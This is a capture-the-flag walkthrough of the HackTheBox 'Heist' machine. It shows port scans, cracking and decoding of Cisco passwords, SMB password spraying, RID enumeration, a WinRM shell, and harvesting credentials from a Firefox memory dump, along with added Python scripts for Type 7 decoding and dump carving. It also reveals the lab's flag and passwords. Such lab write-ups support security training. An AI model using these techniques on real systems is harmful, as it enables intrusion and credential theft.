Decoding the Encrypted Passwords (Type 5, Type 7) Configured on a Cisco Device! HackTheBox Heist Writeup


This time, we decode the encrypted passwords configured on a Cisco device and use them to break into the server.
HackTheBox - Heist: https://www.hackthebox.com/machines/heist

The walkthrough contains spoilers, so be warned.


Preparation

First, start the target machine and note its Target IP Address.

Scanning

Let's start with scanning.

nmap

Run a port scan with nmap.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ nmap -p- --min-rate 10000  10.129.121.71
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:16 JST
Nmap scan report for 10.129.121.71
Host is up (0.33s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 67.14 seconds
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ nmap -sC -sV -p 80,135,445,5985,49669 10.129.121.71
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:20 JST
Nmap scan report for 10.129.121.71
Host is up (0.42s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-09-12T00:21:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.46 seconds

It looks like HTTP, RPC, SMB and WinRM are open.

PORT       STATUS  SERVICE
80/tcp     open    http
135/tcp    open    msrpc
445/tcp    open    microsoft-ds
5985/tcp   open    wsman
49669/tcp  open    [unknown]

HTTP (80/tcp)

Since HTTP is open, let's take a look at it.
A login page is served here.

I tried a few combinations such as admin:admin and admin:password, but could not log in.

There is a "Login as guest" option, so let's log in as a guest.

There is a post about a Cisco router, and it has an attached file.

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

Gaining Access

Let's use the Cisco router information from earlier to gain access.

Password cracking

The attachment contained the following lines.
They are in Cisco Type 5 format.

!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!

The enable secret is hashed with the MD5-based crypt algorithm (md5crypt), so it cannot be decrypted; it can only be guessed.
Let's brute-force it with John the Ripper.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ john --fork=4 -w=/usr/share/wordlists/rockyou.txt hashes
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 512/512 AVX512BW 16x3])
Will run 4 OpenMP threads per process (16 total across 4 processes)
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)     
3 1g 0:00:00:17 DONE (2023-09-10 17:35) 0.05763g/s 50550p/s 50550c/s 50550C/s steamy!!!!..staterr
1 0g 0:00:01:00 DONE (2023-09-10 17:36) 0g/s 52513p/s 52513c/s 52513C/s 2346256..2334364
Waiting for 3 children to terminate
4 0g 0:00:00:59 DONE (2023-09-10 17:36) 0g/s 40471p/s 40471c/s 40471C/s babybillie..baby2626
2 0g 0:00:01:00 DONE (2023-09-10 17:36) 0g/s 54014p/s 54014c/s 54014C/s 1593572584561..1579468342
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We got this password.

  • stealth1agent

Next are these Cisco Type 7 passwords.

!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!

There are online decoders for Type 7, so let's decode these with one of those.

User     Pass
rout3r   $uperP@ssword
admin    Q4)sJu\Y8qz*A3?d
Hazard   ??
??       stealth1agent
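As an added example (not from the original post), here is a small Python audit script that decodes the two Type 7 strings from the attachment with the fixed XOR key that IOS uses for `service password-encryption`, and classifies each credential line by its storage type; the md5crypt `enable secret 5` line is reported as hashed and offline-guessable (as the John the Ripper run earlier in the post showed) rather than decoded. The line patterns and risk labels are my own.

```python
import re

# Fixed XOR key that every IOS device uses for "service password-encryption"
# (Type 7). The key is public and constant, so Type 7 is obfuscation, not
# encryption: anyone holding the config can recover the plaintext.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def decode_type7(encoded: str) -> str:
    """Reverse a Type 7 string: two decimal digits give the key offset,
    the remaining hex pairs are plaintext bytes XORed with the rolling key."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed Type 7 string: %r" % encoded)
    offset = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]
                  for i, b in enumerate(data))
    return plain.decode("ascii")


# Credential lines an IOS running-config can contain (assumed patterns,
# covering the forms seen in the attachment).
_USER_RE = re.compile(
    r"^username\s+(\S+)\s+(?:privilege\s+\d+\s+)?(password|secret)\s+(\d)\s+(\S+)")
_ENABLE_RE = re.compile(r"^enable\s+(password|secret)\s+(\d)\s+(\S+)")

# What each IOS password storage type means to an auditor.
_TYPE_RISK = {
    "0": "plaintext",
    "7": "reversible (Type 7 XOR): recover, rotate, move to secret 8/9",
    "5": "md5crypt hash: not reversible, but fast to guess offline",
    "8": "PBKDF2-SHA256 hash: acceptable",
    "9": "scrypt hash: acceptable",
}


def audit_config(config: str) -> list:
    """One finding per credential line; Type 7 values are decoded in place."""
    findings = []
    for raw in config.splitlines():
        line = raw.strip()
        m = _USER_RE.match(line)
        if m:
            user, keyword, ptype, value = m.groups()
        else:
            m = _ENABLE_RE.match(line)
            if not m:
                continue
            keyword, ptype, value = m.groups()
            user = "enable"
        finding = {"user": user, "keyword": keyword, "type": ptype,
                   "risk": _TYPE_RISK.get(ptype, "unknown type")}
        if ptype == "7":
            finding["plaintext"] = decode_type7(value)
        findings.append(finding)
    return findings


# The credential lines from the attachment quoted in the post.
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f)
```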

These credentials did not get us into the login page, so we continue reconnaissance.

SMB (445/tcp)

Next is reconnaissance of SMB, which is open on 445.

First, let's collect the user names and passwords obtained so far into files.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ cat passwords 
stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ cat users 
rout3r
admin
Hazard

Use crackmapexec to check whether any user and password combination lets us log in.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ crackmapexec smb 10.129.120.32 -u users -p pass 
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing FTP protocol database
[*] Initializing SSH protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing RDP protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB         10.129.120.32   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent

It looks like we can log in as Hazard:stealth1agent.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ smbclient -L \\\\10.129.120.32 -U Hazard                                                                                                                                                                                               
Password for [WORKGROUP\Hazard]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.120.32 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

We can log in, at least, but since smbclient cannot access the shares, there doesn't seem to be any particularly useful information here.

Let's try connecting with rpcclient.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ rpcclient -U'Hazard%stealth1agent' 10.129.120.32
rpcclient $> 

Looking up SIDs gives the following.

rpcclient $> lookupnames hazard
hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)
rpcclient $> lookupnames administrator
administrator S-1-5-21-4254423774-1266059056-3197185112-500 (User: 1)
rpcclient $> lookupnames rout3r
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupnames admin
result was NT_STATUS_NONE_MAPPED
rpcclient $> 

rpcclient can also look names up from a SID.

rpcclient $> lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)

The machine SID is generated automatically when the computer is set up.
The RID (Relative Identifier) of the built-in Administrator is fixed at 500 and that of Guest at 501; user and group RIDs are assigned sequentially starting from 1000.

So let's check the accounts whose RID is 1000 or above.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ for i in {1000..1050}; do rpcclient -U 'hazard%stealth1agent' 10.129.120.32 -c "lookupsids S-1-5-21-4254423774-1266059056-3197185112-$i" | grep -v unknown; done                                                                       
S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1)
S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1)
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1)
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (1)

lookupsids.py can do the same thing!

Let's add the newly discovered users to the users file we created earlier.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ cat users                                                                                                                                                                                                                              
rout3r
admin
Hazard
support
Chase
Jason

With this information, run crackmapexec again.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ crackmapexec smb 10.129.120.32 -u users -p pass --continue-on-success                                                                                                                                                                  
SMB         10.129.120.32   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.120.32   445    SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE

As a result, it looks like we can also log in as Chase.

SMB         10.129.120.32   445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d 

If you get "Error: An error of type HTTPClient::ReceiveTimeoutError happened, message is execution expired", check this!

Let's log in with evil-winrm.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ evil-winrm -i 10.129.96.157 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> 

We logged in without any problems!
user.txt is here, so submit the flag and this part is done.

*Evil-WinRM* PS C:\Users\Chase\Desktop> ls


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        9/10/2023   5:25 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Chase\Desktop> cat user.txt
8c1c82a915ecae8373747d0222136d4b
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.
*Evil-WinRM* PS C:\Users\Chase\Desktop> 

Privilege escalation

Let's go straight on to privilege escalation.

Obtaining a password from a process dump

Looking at todo.txt, Chase is supposed to keep checking the issues list.

*Evil-WinRM* PS C:\Users\Chase> get-process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     94       5      916       4084              2528   0 CompatTelRunner
    499      22    26804      13012              3792   0 CompatTelRunner
    149      10     6640      12144              1816   0 conhost
    500      19     2012       5204               364   0 csrss
    292      13     2252       5032               468   1 csrss
    359      15     3448      14260              4504   1 ctfmon
    254      14     3952      13216              3704   0 dllhost
    166       9     1856       9436       0.05   6400   1 dllhost
    619      32    30476      57984               944   1 dwm
   1494      58    23932      79380              5220   1 explorer
   1043      61   121312     197216       3.50   6152   1 firefox
    347      19    10192      38324       0.05   6272   1 firefox
    401      34    30400      91240       0.72   6488   1 firefox
    378      28    21676      57868       0.36   6652   1 firefox
    355      25    16488      38472       0.14   6932   1 firefox
     49       6     1500       3748               768   0 fontdrvhost
     49       6     1788       4480               776   1 fontdrvhost
      0       0       56          8                 0   0 Idle
    980      23     5408      14024               624   0 lsass
    223      13     3184      10076              3424   0 msdtc
    124      13     6452      13192              6756   0 php-cgi
      0      12      624      14592                88   0 Registry
    275      14     3068      14660              5576   1 RuntimeBroker
    144       8     1640       7280              5760   1 RuntimeBroker
    304      16     5652      16804              5888   1 RuntimeBroker
    665      32    19740      61216              5640   1 SearchUI
    558      11     4968       9480               608   0 services
    669      28    14864      51584              5536   1 ShellExperienceHost
    437      17     4932      23724              5028   1 sihost
     53       3      516       1172               264   0 smss
    471      23     5800      15832              2388   0 spoolsv
    285      13     4184      11128                64   0 svchost
    126       7     1440       6212                68   0 svchost
    201      12     2092       9372               348   0 svchost
    150       9     1816      11344               604   0 svchost
    297      15    10672      12740               616   0 svchost
     85       5      880       3708               724   0 svchost
    872      21     7316      22236               748   0 svchost
    122       7     1236       5368               792   0 svchost
    907      17     5276      11460               856   0 svchost
    258      11     2032       7364               904   0 svchost
    284      13     3664      12460              1016   0 svchost
    381      13    14020      17800              1064   0 svchost
    127      17     3372       7120              1172   0 svchost
    140       7     1300       5464              1204   0 svchost
    222       9     2016       7252              1232   0 svchost
    184       9     1748       7300              1264   0 svchost
    228      12     2548      10904              1312   0 svchost
    430       9     2760       8664              1324   0 svchost
    156       7     1252       5404              1336   0 svchost
    348      14     4296      11448              1412   0 svchost
    170      10     1768       7776              1460   0 svchost
    254      16     3444       8228              1488   0 svchost
    388      18     5076      13776              1524   0 svchost
    304      11     2132       8616              1556   0 svchost
    324      10     2628       8252              1628   0 svchost
    191      12     2188      11708              1636   0 svchost
    163      10     2888       7220              1764   0 svchost
    163       9     1960       6960              1780   0 svchost
    412      32     8496      16952              1864   0 svchost
    239      11     2508       9472              1920   0 svchost
    196      11     1976       7876              1988   0 svchost
    427      64    16100      23028              2012   0 svchost
    377      19    14644      31084              2072   0 svchost
    224      15     4140      13528              2444   0 svchost
    180      22     2500       9520              2452   0 svchost
    166      12     3976      10576              2460   0 svchost
    503      20    12848      26900              2472   0 svchost
    261      13     2584       7656              2496   0 svchost
    164       9     3036       7596              2516   0 svchost
    427      16    10428      19172              2520   0 svchost
    133       9     1636       6308              2568   0 svchost
    136       8     1516       5940              2584   0 svchost
    126       7     1244       5140              2640   0 svchost
    206      11     2264       8116              2648   0 svchost
    209      12     1880       7224              2672   0 svchost
    238      15     4656      11528              2688   0 svchost
    261      20     3272      11940              2712   0 svchost
    467      16     3536      11796              2776   0 svchost
    176      11     2296      13004              2808   0 svchost
    383      24     3392      11964              3204   0 svchost
    226      12     2900      10904              3720   0 svchost
    115       7     1244       5348              3768   0 svchost
    208      11     2696      11688              4280   0 svchost
    171       9     1480       6992              4560   0 svchost
    171       9     4328      11508              4584   0 svchost
    253      14     3096      13424              4792   0 svchost
    220      12     2860      13172              4864   0 svchost
    229      12     3052      13380              5056   1 svchost
    368      18     5772      26832              5088   1 svchost
    197      15     6180      10032              5824   0 svchost
    296      20    10012      14244              5844   0 svchost
    120       7     1348       5824              5924   0 svchost
   1991       0      192        100                 4   0 System
    359      15     4536      18464              3124   1 taskhostw
    211      20     3856      12040              4124   1 taskhostw
    159      50    17380      23240              6244   0 TiWorker
    135       8     1824       6936              4608   0 TrustedInstaller
    167      11     2900      10624              2736   0 VGAuthService
    144       8     1712       6584              2744   0 vm3dservice
    138      10     1856       7060              3084   1 vm3dservice
    383      22    10076      21788              2660   0 vmtoolsd
    236      18     5072      14832              4856   1 vmtoolsd
    245      21     5728      14408              6624   0 w3wp
    171      11     1460       6696               488   0 wininit
    286      13     3040      12632               540   1 winlogon
    346      16     8780      18044              3912   0 WmiPrvSE
    314      15    23304      31412              5784   0 WmiPrvSE
    788      27    51864      69856       1.13   6408   0 wsmprovhost


The suspicious one here is firefox.
Judging from this, it is quite likely that the issues list is being viewed in Firefox.

Upload procdump.exe to the target machine.

*Evil-WinRM* PS C:\Users\Chase> upload ../HackTools/procdump64.exe Desktop\procdump.exe
                                        
Info: Uploading /home/hack_lab/HackTheBox/../HackTools/procdump64.exe to C:\Users\Chase\Users\Chase\Desktop\procdump.exe
                                        
Data: 566472 bytes of 566472 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase> 

Once it is uploaded, specify the firefox process ID and take a dump.

*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump.exe -ma 6152 firefox.dmp

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

(Sysinternals software license terms omitted)
This is the first run of this program. You must accept EULA to continue.
Use -accepteula to accept EULA.

As it is, this does not work.
It says to run it with -accepteula first.

*Evil-WinRM* PS C:\Users\Chase\Desktop> ./procdump.exe -accepteula

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

Monitors a process and writes a dump file when the process exceeds the
specified criteria or has an exception.

Now let's take the dump again.

*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump.exe -ma 6152 firefox.dmp

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[19:33:46] Dump 1 initiated: C:\Users\Chase\Desktop\firefox.dmp
[19:33:46] Dump 1 writing: Estimated dump file size is 506 MB.
[19:33:49] Dump 1 complete: 506 MB written in 2.8 seconds
[19:33:49] Dump count reached.

*Evil-WinRM* PS C:\Users\Chase\Desktop> ls


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/10/2023   7:33 PM      517803077 firefox.dmp
-a----        9/10/2023   7:25 PM         424856 procdump.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        9/10/2023   5:25 PM             34 user.txt

The dump was taken successfully.
I'd recommend downloading the dump to your local machine.

Let's go back to the login form and see which parameters it uses.

We can see that the password is sent in a parameter named login_password.

Extract the string login_password from the dump.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ strings -el firefox.dmp | grep login_password
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
b&login_password=4dD!5}x/re8]FBu
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
-os-restarted localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
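The `strings -el | grep` step above works because the browser's command line and crash-reporter environment hold the login URL as UTF-16LE, and the form submitted the credentials as a GET query string, so they sit in process memory in clear. As an added example (not part of the original post), this Python script does the same extraction over a constructed dump fragment and flags every URL whose query carries a password-like parameter; the host, the sample bytes and the password in them are made up.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Equivalent of `strings -el`: runs of printable ASCII stored as UTF-16LE
# (each character followed by a NUL byte), at least MIN_LEN characters long.
MIN_LEN = 8
_UTF16LE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)

# Query-string keys that should never be carried in a URL (assumed list).
SECRET_KEYS = ("password", "passwd", "pwd", "secret", "token")

# Something that looks like host/path?query, with or without a scheme.
_URL_RE = re.compile(r"(?:https?://)?[\w.:-]+/[^\s\"]*\?[^\s\"]+")


def utf16le_strings(blob: bytes) -> list:
    """Return the printable UTF-16LE strings found in a raw memory dump."""
    return [m.group(0).decode("utf-16-le") for m in _UTF16LE_RUN.finditer(blob)]


def find_credentials_in_urls(blob: bytes) -> list:
    """Flag every URL-shaped string whose query carries a secret parameter."""
    hits = []
    for s in utf16le_strings(blob):
        # The URL may be wrapped in a command line or an environment
        # variable (MOZ_CRASHREPORTER_RESTART_ARG_1=...), so search inside.
        m = _URL_RE.search(s)
        if not m:
            continue
        url = m.group(0)
        full = url if "://" in url else "http://" + url
        params = dict(parse_qsl(urlsplit(full).query))
        secrets = {k: v for k, v in params.items()
                   if any(tag in k.lower() for tag in SECRET_KEYS)}
        if secrets:
            hits.append({"url": url,
                         "user": params.get("login_username"),
                         "secrets": secrets})
    return hits


# Constructed sample: a tiny slice of what a browser process dump looks like
# (command line, crash-reporter restart argument, an unrelated URL), with a
# made-up host and password.
_LOGIN_URL = ("localhost/login.php?login_username=admin@example.test"
              "&login_password=Made-Up-Pass-1&login=")
SAMPLE_DUMP = (
    b"\x00\x01\x02garbage"
    + ('"C:\\Program Files\\Mozilla Firefox\\firefox.exe" ' + _LOGIN_URL).encode("utf-16-le")
    + b"\xff\xfe\x00\x00"
    + ("MOZ_CRASHREPORTER_RESTART_ARG_1=" + _LOGIN_URL).encode("utf-16-le")
    + b"\x00\x00"
    + "https://example.test/health?ok=1".encode("utf-16-le")
)

if __name__ == "__main__":
    for hit in find_credentials_in_urls(SAMPLE_DUMP):
        print(hit)
```

A form that posts credentials in the request body keeps them out of the command line, history and crash-reporter arguments, which is why a login form should never submit with GET.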

The password for admin@support.htb is "4dD!5}x/re8]FBuZ". Since the person who runs the support site very likely administers the box as well, it is worth trying the same password against the local Administrator account.
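As an added example (not part of the original writeup), the following Python script generalises the strings -el | grep pipeline above: it carves both ASCII and UTF-16LE printable runs from a dump, finds URL query strings in them, URL-decodes the parameters and returns the unique username/password pairs. Truncated fragments such as "b&login_password=4dD!5}x/re8]FBu" above carry no complete URL and are therefore skipped instead of producing a wrong password. The SAMPLE_DUMP bytes are constructed for the demo; pass the path of the real firefox.dmp as the first argument to scan it instead.

```python
"""Carve login credentials from a process memory dump (added example, not from the writeup)."""
import re
import sys
from urllib.parse import parse_qs, urlsplit

# Constructed sample "dump": a UTF-16LE copy of the Firefox command line (Windows keeps
# process command lines as wide strings), a truncated ASCII fragment like the one in the
# real dump, and a complete ASCII copy of the URL. The credential values mirror the page.
_URL = "localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login="
SAMPLE_DUMP = (
    b"\x00" * 16
    + ('"C:\\Program Files\\Mozilla Firefox\\firefox.exe" ' + _URL).encode("utf-16-le")
    + b"\x00" * 8
    + b"b&login_password=4dD!5}x/re8]FBu"  # truncated fragment: no '?', so no URL match
    + b"\x00" * 8
    + ("http://" + _URL).encode("ascii")
    + b"\x00" * 16
)

PRINTABLE = rb"[\x20-\x7e]"
# host/path?query, optionally with a scheme; stops at whitespace and quotes
URL_RE = re.compile(r"(?:https?://)?[A-Za-z0-9.-]+/[^\s\"']*\?[^\s\"']*")


def carve_strings(data: bytes, min_len: int = 8):
    """Yield printable runs: ASCII (like `strings`) and UTF-16LE (like `strings -el`)."""
    for m in re.finditer(PRINTABLE + b"{%d,}" % min_len, data):
        yield m.group().decode("ascii")
    for m in re.finditer(rb"(?:" + PRINTABLE + rb"\x00){%d,}" % min_len, data):
        yield m.group().decode("utf-16-le")


def extract_credentials(data: bytes, user_key: str = "login_username",
                        pass_key: str = "login_password"):
    """Return sorted unique (user, password) pairs carried in URL query strings."""
    creds = set()
    for s in carve_strings(data):
        for url in URL_RE.findall(s):
            # parse_qs percent-decodes, so encoded special characters come back intact
            qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
            if user_key in qs and pass_key in qs:
                creds.add((qs[user_key][0], qs[pass_key][0]))
    return sorted(creds)


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for user, password in extract_credentials(blob):
        print(f"{user}:{password}")
```

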